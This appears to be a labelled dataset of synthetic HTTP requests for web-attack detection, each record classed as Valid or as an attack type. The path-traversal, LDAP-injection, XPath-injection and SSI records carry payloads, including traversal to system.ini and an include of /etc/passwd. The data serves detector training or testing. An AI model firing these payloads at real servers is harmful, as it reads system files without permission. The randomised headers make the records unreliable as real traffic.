GET /aba/ZhttpsSzKyJZXdW/ahcerdnt1euaGBles5ll/oqv2ymLaa/fdrtjaAqiqB34e/@3bpY/eRqRAHHHB3Gcr@/yt20iwaetw/p-MQWeHH.wMI/tD.php4?i5=an4eUie%7Cm%2Foa1zpstyle&ohtaccesxek=gnnsms+hrr%246ti+urcp0&hsS2srmeEd=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&csoda=re HTTP/1.1
Host: www.sswisr.uk:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-10646-ucs-2, x-mac-ce;q=0.4, macintosh
Accept-Encoding: 
Accept-Language: a6-fuweeu, ahi-P
Cache-Control: max-age=661
Client-ip: 79.240.194.64
Cookie: 66tyb=639;0AiframedeIh8usrZ9=6;p9aef0odseanh6o=erU
Cookie2: $Version="26"
Date: Mon, 09 Mar 09 24:41:10 CET
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: 100-continue
From: rsj6lTrn@Ezll0rry.ch
If-Modified-Since: Sat, 17 Feb 07 20:53:10 CET
If-Unmodified-Since: Sun, 03 Jul 05 20:05:06 UTC
If-Match: "e5qxvOp6TSK@qYqV"
If-None-Match: *
If-Range: *
Max-Forwards: 5533
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: poeeh dwdky=eorL
Authorization: Basic ZGtuT2Npajp0TWlPMnQ=
Range: 855-
Referer: http://zceasr.uk/eOqitx/jeair2Oo/peTse/S5en4ed/ttwibZ.css
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: jdirgi/2.4.3.3.2
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9422x259
Via: tA4cu/1.3 76.219.127.217, 9.4 23.44.129.57
Transfer-Encoding: gzip
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 324157325
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45785
Start - Id: 45362
class: PathTransversal
POST /hr2e/wfrwwriqrrn.tiff? HTTP/1.0
Content-Length: 126
Content-Language: tfvEe4
Content-Encoding: deflate
Content-Location: http://kndq.biz/ob8s/84inw/3hmn.swf
Content-MD5: bnZpZ3NFMmVFYjhzYWVkYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 Dec 08 24:17:23 GMT
Last-Modified: Wed, 11 Feb 09 08:05:17 UTC
Host: 89.211.41.80:93562
Connection: close
Accept: */*;q=0.4
Accept-Charset: hz-gb-2312;q=0.0, windows-1257, x-mac-cyrillic;q=0.4, euc-cn;q=0.8, x-mac-roman;q=0.2
Accept-Encoding: *
Accept-Language: C-oioOxu;q=0.8, h-tsyCea, 9lda-Kbor, emEeEs-r;q=0.9
Cache-Control: no-transform
Client-ip: 76.203.238.234
Cookie: eL8boot.inin=3;Dale= aobjectrr;raueiews5uglu=mrwch;sryteita=iuorchem5
Cookie2: $Version="75"
Date: Thu, 13 Mar 08 03:45:50 UTC
ETag: W/"U2a0GiJc3J0cPtWSB_w4"
Expect: 100-continue
If-Modified-Since: Sun, 16 Sep 07 19:46:32 UTC
If-Unmodified-Since: Mon, 06 Sep 04 10:55:04 UTC
If-Match: "XLW0ur@4Xfo75Sl2"
If-None-Match: "xKe7vNp18q9iB1QsC2j"
If-Range: Fri, 16 May 08 06:20:33 GMT
Max-Forwards: 7
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Authorization: NTLM dW41NXJjaVRlcmVpVGNidGhhN25FcHNsbnRvaWh3aWluZGV6M3NvZQ==
Range: 53-,6570-433377,-5771
Referer: http://www.hCro0.org/ca0ne/sAolweb.pl
TE: trailers,gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/4.6 (Windows; U; Win98 5.5; so-2r; rv:0.0.2) Gecko/83504895
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Pixels: 441x030
Via: FTP/8.8 www.oFsc872a.shtml, rde0/8.2 www.ahougtr.png
Transfer-Encoding: gzip
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

npm=bnjXBxH2xen.&oybaee5AwnaveU=..\..\..\..\..\..\WINNT\system.ini&knireH=2-oc&1errnS2isEOrina= o&oznVpKg0Z_t=32

End - Id: 45362
Start - Id: 3863
class: Valid
PUT /shve8nfgRyWW.n.n8/n-6MtbK1Ii6N/updateidU0dE7S/areiz/bdrtlvhnu/Pmw59uyS/eDH@g4J/3anltii7dce5besruine/cw8jnt1Ihw.htm? HTTP/1.0
Content-Length: 278
Content-Language: tGbmnn,en9Beco
Content-Encoding: gzip
Content-Location: /f7oomRa/ytdoe.cgi
Content-MD5: dWFyc2VpbnNyZWVzaGlzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 May 08 03:23:01 UTC
Last-Modified: Thu, 12 May 05 05:08:02 GMT
Host: www.li2A.uk:80
Connection: tygie
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=01
Client-ip: 88.69.134.15
Cookie: skhkiestsv=hquiruee;sMaia=81700;ihtiiErmfn3ends=x ;0qOqT9ii=qho
Cookie2: $Version="791"
Date: Wed, 15 Feb 06 24:39:01 CET
ETag: W/"4CuJc2UOB2IJoeLBxRF"
Expect: 100-continue
If-Modified-Since: Fri, 11 Sep 09 01:48:20 GMT
If-Unmodified-Since: Sat, 19 Sep 09 12:41:19 UTC
If-Match: *
If-None-Match: *
If-Range: "YXD-NqVFgtkpBxz7oM@f"
Max-Forwards: 56
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest response="De66272Faccbf0D0AB5EeE7D2E7bBaFa"
Authorization: NTLM NHF0eXVpdHJpWm9lc3RzOWVlaTZob2N0cmVPc2hvTGhuZXNBcHRub2dyaWV0aTg=
Range: 459294-700,2-,-859
Referer: /ustXUri/Neor/Oioi/muW6.jsp
TE: deflate,trailers
Trailer: User-Agent
User-Agent: retortse/9.0.9
UA-OS: WinNT
Via: ioMh/7.4 www.utsitn6U.png, 5.0 www.ihweu96w.jpg, fIpee/5.5 www.edez.png
Transfer-Encoding: identity
Warning: 358 50.141.159.101 "eefthcbta34PysTeoes" 
X-Forwarded-For: 98.4.104.84
X-Serial-Number: 4807054029601
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wdocument4KlI3sF4openS=Npetteo&JlogstdinvkbZbaS=nAgh&eEd8e1Sendm0=7or qonulliy a4qnornpdo&z_m_ibmA=tsnwpcjt25w&eenld=b0orjBd&ddnewexdet=0leR4Zl&xUs.=Cao@litt&execcO@4Fla=ponivbscripttawOoninw&ithEumethlsi=437388&eivns7ce3qinid=27&@2FG_Q=87961&rsacoi9=o <+opt]fh0doea%v

End - Id: 3863
Start - Id: 8737
class: Valid
GET /0sn39ohjiootu9tot.php3?as=77&ntz89=o%29&.hrmO7PY1=384&uenkfr=vOmmlu&nlar2s=trdhuehseiirns&ealirslsrt=7370&jkomoeqs=mntetteo%2B&eTay=gonu3D&d3slp3ths=9&oi7i7t3nhou5Th=i%7Eazeylupdate%5D HTTP/1.0
Host: www.miWf.fr
Connection: ptqdt
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: yRuwkao-Nitetalr, eh-Re3h2;q=0.0, tasnaii-noC5, MbBzq-r
Cache-Control: max-age=61
Client-ip: 201.93.83.168
Cookie: fi42nii=0
Cookie2: $Version="5"
Date: Thu, 18 Mar 10 07:22:32 GMT
ETag: W/"de73ZrEr98H9jB24"
Expect: 100-continue
From: siot@auhtnt8.net
If-Modified-Since: Tue, 24 Nov 09 01:27:29 GMT
If-Unmodified-Since: Thu, 06 Oct 05 21:24:46 UTC
If-Match: *
If-None-Match: *
If-Range: "tHfkeM79v3K5lAqVyDm"
Max-Forwards: 6293
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDFlb2lFa2lycG5vbnNhckN0T3lzd2VpMXJWZ2hFeWN3dHRlYTBkc1ZlZEhvZXQ=
Authorization: ea8roh btmseSDa=reeoamu
Range: 06444-6,8288-2155
Referer: /inat4som/f1lhHnp/Ers3.zip
TE: deflate;q=0.0,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/6.4 (compatible; Konqueror/1.8; Linux i586; o3dnro; agaaitw)
UA-CPU: PowerPC
UA-Disp: 492,1838,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 323x9926
Via: FTP/1.2 173.42.96.186:40755
Transfer-Encoding: gzip
Upgrade: nr2n/6.6, c8dm/9.0, eih/0.8, mee/9.2
Warning: 196 69.31.102.112 "meOretmuAnoa24aNg" "Sun, 13 Nov 05 21:30:28 UTC"
X-Forwarded-For: 187.247.91.168
X-Serial-Number: 14852095010495286519
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8737
Start - Id: 12809
class: Valid
GET /x.fU@DakHdrpCXY4k/tK/E%u.exe?nrrHgpt=cu%2Bi%7Esdn%3F&l5rw=+%5D4ep&nkMXLoA=mtop%3F%5Bcc1t&ZIlRQ6_3KNvG=telnetTenuers+%253 HTTP/1.1
Host: www.az5a.cz
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-8;q=0.9
Accept-Encoding: compress;q=0.7
Accept-Language: *;q=0.9
Cache-Control: max-stale=7800
Client-ip: 186.162.244.242
Cookie: 7etesm=terIre
Cookie2: $Version="0"
Date: Wed, 27 Dec 06 13:25:21 UTC
ETag: "QzPcqpZi2O_q9GB@WG"
Expect: 100-continue
From: tibfhrt@6ra7.com
If-Modified-Since: Sun, 10 Dec 06 10:02:51 CET
If-Unmodified-Since: Wed, 02 Dec 09 13:11:55 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Jan 08 19:23:51 UTC
Max-Forwards: 51
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Dd9wtz rtdAWeey=ue7dsn
Range: 880687-,10-
Referer: http://www.xnReeei.uk/ehuya.jpeg
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: si8sntre
UA-CPU: x86
UA-Disp: 3127,7217,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8634x945
Via: FTP/5.7 www.mlLS5s.gif:9672, 5.1 119.90.254.177:4, tdfvik/8.5 50.178.54.198:130
Transfer-Encoding: compress
Upgrade: DoR/2.1, rahogo/2.6
Warning: 874 221.126.39.245 "ycncote55" "Thu, 14 Jun 07 16:04:25 GMT"
X-Forwarded-For: 129.36.3.102
X-Serial-Number: 392683968
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12809
Start - Id: 1655
class: Valid
GET /tleYesBbe/aS/imiFIyFJ2YUTv.jpg?he=2045&t0sehoTauetL=8teee4mocha&5iraeiLeg8i4k=daes&Aryooe7mifktTu=66TwkEFkln&oo8eiSirLt=1547059&zlA8=-amto&el2waHa=te+nUt7nlocation&05sbD=7438240&optqZx9=26&ovwc=ay&iah=rm5j6%40PDvwB9&79Unull=sh5ttd&Eo5=tsQR2JUoOuiJ&LGKF=7runarUilraeeeE%3B&-AAV9M0G=7 HTTP/1.1
Host: www.undt.be
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.0
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-age=471
Client-ip: 233.154.243.51
Cookie: 9undtWn=eu;edh6Tuotjide=i3V;w6rghacteTntos=~~a;s;V39hltyu=ynrdan4nu;R8lstlbKtrEhnq9=962592
Cookie2: $Version="878"
Date: Sun, 03 Jun 07 11:21:51 CET
ETag: W/"bMCVqCdZp90EHMf8XQ5"
Expect: 100-continue
From: S6tD@nser.com
If-Modified-Since: Mon, 05 Apr 04 06:01:28 GMT
If-Unmodified-Since: Tue, 18 Nov 08 16:10:58 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Jun 06 24:46:19 UTC
Max-Forwards: 6
MIME-Version: 9.8
Pragma: la='6f'
Proxy-Authorization: NTLM dG1ycjR5b3JlbmV0UnQyaDlvVGVMYWlrdGU0ejFjaW9vNm8y
Authorization: inSf0 tqhf8ec2=inlbEtS
Range: 076818-,251-
Referer: /teeu/wetbCea/ohha/nagnSkbe.cgi
TE: gzip;q=0.7,gzip;q=0.8,gzip
Trailer: Via
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 1.6; rn-tl; rv:3.5.5) Gecko/92872713
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8230x578
Via: HTTP/2.2 240.65.84.192
Transfer-Encoding: deflate
Upgrade: toe/3.4, erkdin/7.1, 5elTNe/2.3, n0otGk/3.5
Warning: 043 205.130.181.187:01570 "r9oi9t" "Thu, 28 Jul 05 10:14:18 GMT"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1655
Start - Id: 21326
class: Valid
GET /g4kUbboot.iniTY/6wHone2a/nIhv4gm/8Prm2A%uGhZLhbetween1X/e6cI5zZYKiTMAyZ7EO-d/vLPEFo6SsOlH1E/mthne2eceVitpyc/tr/chIIzsaeinaaar/ay3k@ZH.js?uiaevbnauee=dZlZ7&DDLYBdOlH=dRzJj_n&@2tASR2Kj=ncp2Xj%40&oiyhndxtTsD=405&tmpGlLriU=sva7feu&hmwu=ke%25rjnie+itjdii&ssseta8ol=eLaccepty6xEincludeehuhacacnetcath&ro=cmp&neoEtp=siiee49djw0eu8yhts&uo5ienoaeiersae=avgs&eotytetiks=tjTtsnslrhfdr HTTP/1.0
Host: www.Thelii.ch
Connection: ecyt
Accept: */*
Accept-Charset: iso-8859-8;q=0.1, iso-8859-6, windows-1258;q=0.0, x-mac-ce;q=0.3, hz-gb-2312
Accept-Encoding: *;q=0.9
Accept-Language: nD-e;q=0.8, 8m3ti2us-sr;q=0.0, hJeqse-5i0ie0I;q=0.2, m-ang
Cache-Control: max-stale=3395
Client-ip: 107.104.243.184
Cookie: 2etuio=xmlha
Cookie2: $Version="158"
Date: Tue, 13 May 08 06:03:21 GMT
ETag: W/"_JgP_hIeE0JkXWG"
Expect: 100-continue
From: rd1eArm@0dui5ee.biz
If-Modified-Since: Sat, 19 Aug 06 04:28:58 GMT
If-Unmodified-Since: Sun, 29 Aug 04 12:57:37 GMT
If-Match: *
If-None-Match: "1AZrELr01qTZPEtgI"
If-Range: Sun, 17 Feb 08 10:26:39 GMT
Max-Forwards: 45
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic ZXN5VGE6b2lhcnFzZQ==
Authorization: NTLM eGhkcm14bjByZDVlSW5pclRBZjgweG5yYUVJNTN0dmNpYUFPdGh4c3Zs
Range: 8-2936,2807-187745
Referer: /9dbpEBrt/Peebi6ea.pdf
TE: gzip;q=0.3,trailers
Trailer: Date
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 6.5; ts-ea; rv:5.1.9) Gecko/65415349
UA-CPU: PowerPC
UA-Disp: 5168,522,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 040x521
Via: 2.9 www.LEttxeb.jpg:688, 1.5 www.roeklrAy.css:84752, e3t7b/6.7 124.28.0.88
Transfer-Encoding: hg3t; soE7=1miehh
Upgrade: ews/8.3
Warning: 447 www.bZeni6p.shtml "AoEoefv3atbtNidjY9e" 
X-Forwarded-For: 145.243.54.100
X-Serial-Number: 2418413
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21326
Start - Id: 6212
class: Valid
PUT /noO/ohese/oIh6ionIcowIblEaoCwt/rbdD/rlsaeedmfntyeuN/eo-PN7y_K.jpeg? HTTP/1.0
Content-Length: 35
Content-Language: ne99rq,used4bm,a
Content-Encoding: gzip
Content-Location: http://wtsn.it/nctf/irn6sca/aeeoa/ecxshed.asp
Content-MD5: OHRlZXJkc2VzcG9TcGVlcA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Dec 07 19:15:24 CET
Last-Modified: Wed, 03 Feb 10 11:56:15 GMT
Host: www.wHvdg.net
Connection: teq7no
Accept: */*;q=0.3
Accept-Charset: utf-8;q=0.6, iso-8859-2;q=0.8, cp-932, x-mac-hebrew;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: a=ta2noo
Client-ip: 225.75.47.14
Cookie: egoAas0aorr=@ezibh;982dgoQ9onnd=3024
Cookie2: $Version="4"
Date: Tue, 09 Jan 07 23:53:37 GMT
ETag: W/"XSfWp9Vf4w3PBEA"
Expect: 100-continue
From: 9gene@c1isinsH.it
If-Modified-Since: Tue, 12 Oct 04 16:41:52 CET
If-Unmodified-Since: Fri, 13 Feb 04 21:04:41 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 177
MIME-Version: 1.5
Pragma: sNltsA='e'
Proxy-Authorization: Basic dFJsYXJlbzM6MHFvcw==
Authorization: EIEd eOnvph=0yuacswt
Range: 08944-,040-34609
Referer: /8ctl/iepvhn/stcrj.tiff
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: eenurah4mydhlt2oe
UA-CPU: Sparc
UA-Disp: 5852,332,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 478x1113
Via: HTTP/8.2 www.tn5i.png
Transfer-Encoding: ar3s
Upgrade: hearu/8.5
Warning: 555 94.168.0.143 "gwzateahhss4B" 
X-Forwarded-For: 27.53.52.203
X-Serial-Number: 3711226
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

laszRh=jsh telnet&fe1eiemopg=Eiktho

End - Id: 6212
Start - Id: 37212
class: LdapInjection
GET /8umjQNzNX3F.wSbvrYX/uB.6NMQXselectpG/ee/3ycoos/elk4DEoH/Z7.mdb?madwo=1936016262&e3sEoaibnDm=hOrF&aa=3098930&ele0ycm=480623&OpIcoTgTocfrtol=nsL&txinowrrned=oo2sstaAni&b3oonrrcRyor=91&xc5kf0aTscript=6f0o%29%28%26%28objectClass+++%3D++++Eg*%29&it=467098&16eeeEses6hEr=6573955 HTTP/1.0
Host: www.n2knxOze6e.org
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 8e-sTptr, tRd-4mg, luphf-oog;q=0.7, b1etonmg-esonnic, n-umpy;q=0.5
Cache-Control: onarhn=7eom
Client-ip: 98.210.207.217
Cookie: rvtzacoidtce=fqwZKBw0x8;evtEoeepa2TOp=558601351
Cookie2: $Version="43"
Date: Wed, 31 May 06 11:55:20 UTC
ETag: W/"nGU3RVy8tOKIK4L"
Expect: 100-continue
From: ejgouV@q9tOejr.uk
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Thu, 10 Apr 08 03:01:15 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Aug 05 07:08:37 CET
Max-Forwards: 5682
MIME-Version: 2.5
Pragma: 5mfeisdo=arnm
Proxy-Authorization: Digest realm
Authorization: Basic ZWxiNTpydDMw
Range: 605-286224
Referer: /7rnoLnuz/deaytkoo/ehehn.exe
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 2.6; fa-sn; rv:6.7.7) Gecko/94711937
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: FTP/5.4 www.m9rtzhn.jpg, 3.3 139.27.23.30, 1.3 80.178.67.6
Transfer-Encoding: ntwcr; alher7=urwa8
Upgrade: etyvet/1.7, 9mEHd/4.9, saaq/1.8, 9irhSi/8.2, ooten3/4.3
Warning: 835 30.241.51.47 "4eor3o4bh0icK" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37212
Start - Id: 49127
class: XPathInjection
GET /tsNSeiihlchfez7/zrHwac4Orik/eueS8QkNk.l.QK/SAYp0MXKzqcc/othiyrw/idPj/Gurle/lyiehoft1hsutofe.css?itbofce=scvvw3aee8e&aaaneu0rTrjts=ifhsyhechop-de-e+irdspt&e9c0he7ti=96&Xf77=QfEhss&tonltwnDTtttot=tvtt&4ctmpv=ly+&IMK4=tossiaOl1aTIeyug4t&idHC3DZSv=49588974&mrenzIsNd=etelnetce&aih4qf=wr%27++or++++1%3C+++++n%2FIhn%2Fh%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D2%5D+++or++++%276i6aerhn%27+++%3D+++%27 HTTP/1.1
Host: 4.113.152.48
Connection: waJht
Accept: text/*;q=0.0, audio/*;q=0.8
Accept-Charset: x-mac-arabic, koi8
Accept-Encoding: gzip;q=0.2, deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 172.57.198.77
Cookie: qeTmhstd=tX@;uxq8cB6=hF.KIUbQ;ltaatmi8edaueup=453;ttc0=83048532;nosTntserhDyN=mros8~h9dj)r)rs;eairbOnfyhv=8353243
Cookie2: $Version="54"
Date: Mon, 23 Feb 04 19:04:37 CET
ETag: W/"Tvi9KhEHOu0-YyM"
Expect: ncoi=abhI
From: NktwIe@earsOsuo.org
If-Modified-Since: Thu, 13 Mar 08 12:24:22 GMT
If-Unmodified-Since: Wed, 30 Jun 04 12:49:32 CET
If-Match: *
If-None-Match: *
If-Range: "-m__3mTvQ_-vhY8b"
Max-Forwards: 149
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic YWFpZDpkYW90YW5q
Authorization: Digest uri=/etan5eu/Td7eez/2akw8i.php3
Range: 137110-8612,-4,90364-3
Referer: http://yl7k.it/ar8dbshh/lmtvr.dll
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/6.2 (X11; U; SunOS sun4u 8.9; sl-rh; rv:9.3.1) Gecko/06206690
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 468x973
Via: FTP/6.6 7.245.28.153, 6.6 www.EhIep.html
Transfer-Encoding: compress
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 017399203750342
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49127
Start - Id: 15035
class: Valid
GET /eqA/.T8dSOWTcIHV-hlocation/i4ytoRd/hiRmpmvT2782uOJ/5Ca5gtgawldnye/sdhnar1ea/bn1aO6lGC.sh? HTTP/1.1
Host: www.aho27ea.biz:977
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-korean, isiri-3342, ks_c_5601-1987;q=0.2
Accept-Encoding: identity, gzip;q=0.9
Accept-Language: *;q=0.8
Cache-Control: min-fresh=2400
Client-ip: 40.118.86.87
Cookie: 2ooihhu=;;porsnae3cc=428584;hmiiod3eslpa= having3tmpy
Cookie2: $Version="713"
Date: Wed, 15 Nov 06 03:08:35 GMT
ETag: "q1ErS3VBh4hh9.pklpw"
Expect: 0ealt3eo=su3k1ao;Tm6nnrcd=spfbb9
From: NBko@ilcocf4eu.ch
If-Modified-Since: Sat, 18 Apr 09 14:42:14 CET
If-Unmodified-Since: Sat, 03 Apr 04 01:02:57 GMT
If-Match: "QbfMrxPhO7H0Na9"
If-None-Match: *
If-Range: Mon, 26 May 08 02:29:37 GMT
Max-Forwards: 660
MIME-Version: 2.9
Pragma: te='m'
Proxy-Authorization: 0hoNu r7lmg0=wsTsa
Authorization: iashul hred0=ggjeieg
Range: 87261-
Referer: http://www.roNearY.fr/abng/euiwn/eitdam2u.css
TE: deflate;q=0.3,trailers
Trailer: If-Range
User-Agent: Mozilla/2.4 (Windows; U; Win98 9.7; uo-te; rv:3.2.5) Gecko/14708242
UA-CPU: MIPS
UA-Disp: 7976,801,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7618x6392
Via: HTTP/5.2 www.mr9stae.gif, 6.3 215.131.94.113
Transfer-Encoding: deflate
Upgrade: 7pnrhe/1.7, tyytsb/2.7, rnTs/2.9, cgit/1.6, tek/9.5
Warning: 661 152.187.129.71 "lnNahtrioImlhbiy" 
X-Forwarded-For: 161.230.118.153
X-Serial-Number: 958943826904140
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15035
Start - Id: 39737
class: SSI
GET /XcNuA4Um/kyqservicescKDNjPPbLq7/en9ul7lpe/sd37XpxBpxa6Z0_kNp/tkb7-/3liUINKSg/4x23/6aof/bvcmu1iHetnrtr/sre1bt8sohn9ie2T2/ttl/m5jbW5v.shtml?aTii84=awnf%5Cmotonytr&hbRysryrnecp6c=70838&xsmlvwateEbhaeH=4587&icedfee0nnent=4588286965&mraettogqo=3144580171&alhiaiese=zhNv&8zive=lsqAH&au=f5xqX5%40-HBh3&sNvhe=sterealnievxeiroV&Csry6SefswNt6d7=%3C%21--+++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&nna=0683874 HTTP/1.1
Host: 148.20.88.220
Connection: rsnoch
Accept: */*
Accept-Charset: cp-950, euc-jp;q=0.8, x-mac-japanese, isiri-3342;q=0.3
Accept-Encoding: *
Accept-Language: rbPaetr-tfns, ehknn-tia;q=0.4, lgaoShe-irSttou;q=0.1, YOdeslO-dgrca
Cache-Control: min-fresh=2
Client-ip: 127.62.226.109
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="7"
Date: Mon, 26 Feb 07 07:55:43 GMT
ETag: "G.@eSHdXR_aNTR7xQ7z"
Expect: 100-continue
From: edtEiwvr@nastnEtx.it
If-Modified-Since: Thu, 09 Feb 06 12:23:12 UTC
If-Unmodified-Since: Fri, 23 May 08 16:48:19 CET
If-Match: "VB-CR1dEDdJkDQNi"
If-None-Match: *
If-Range: "W6mTMCkvr6JinUU1"
Max-Forwards: 8741
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: 5O8lgd dEae=hb6eE
Authorization: Ilaaw 1hcnv=r7t63
Range: -58,-7,-12255
Referer: http://www.2v5hehuq.com/csjiuo.rar
TE: deflate
Trailer: Host
User-Agent: Mozilla/7.5 (X11; U; Unix 2.8; ge-py; rv:3.9.7) Gecko/83919379
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 602x675
Via: 8.7 31.3.176.208, pdt3i5/7.2 12.54.88.254, 1.8 222.255.101.54
Transfer-Encoding: gzip
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39737
Start - Id: 6101
class: Valid
POST /sno/531c4g2cT/sMhn6Ay/ijgBC6V41TXjs/hentnersnnttoao1/2hdeeLi/wXdNsOUy6vqe/sietymeAc/LwG/bp5n.pl? HTTP/1.1
Content-Length: 257
Content-Language: o7sxk,2m
Content-Encoding: identity
Content-Location: http://www.oifpnBj.be/tetvha/eooes/eo6Suns.png
Content-MD5: M2VpNmE5bXl2dG91bnRuNA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 May 07 24:04:20 UTC
Last-Modified: Wed, 22 Dec 04 17:40:09 GMT
Host: 235.76.253.148:0
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: ei-uiyLiRt;q=0.6, tey19n-h1heap;q=0.8, rse-d;q=0.9
Cache-Control: min-fresh=01011
Client-ip: 86.254.200.116
Cookie: I.likeG3SeXr=0;eoaeAi=tdflvzk.Mx;Tnaew4lsts=7 Adlrifoh
Cookie2: $Version="3"
Date: Wed, 10 Jun 09 13:12:27 GMT
ETag: W/"lkeq@uY3slcmjBDevj9"
Expect: mEhD=y8nam
From: g0cci8@oemaeN.uk
If-Modified-Since: Thu, 04 Nov 04 13:32:13 CET
If-Unmodified-Since: Tue, 19 Jan 10 03:09:28 UTC
If-Match: *
If-None-Match: "GI-uJp@aPrhIO1wr88q6"
If-Range: Sat, 07 Feb 04 12:43:48 CET
Max-Forwards: 7954
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic VGdkZXJ4OkVlbE51eXM=
Range: 32908-897936,302-48186
Referer: /ylDNrh.css
TE: chunked,trailers,chunked
Trailer: Host
User-Agent: eddnfytnb4h
UA-CPU: 68000
UA-Disp: 0756,235,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4456x1785
Via: 0.4 144.5.30.45
Transfer-Encoding: deflate
Upgrade: qdoi/7.1, etiX/1.2, Sor/4.3, ex2/0.1
Warning: 650 69.47.85.230 "eneld6Odeonlenmnn" "Tue, 12 Aug 08 13:16:53 CET"
X-Forwarded-For: 224.40.113.11
X-Serial-Number: 04810126280202
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

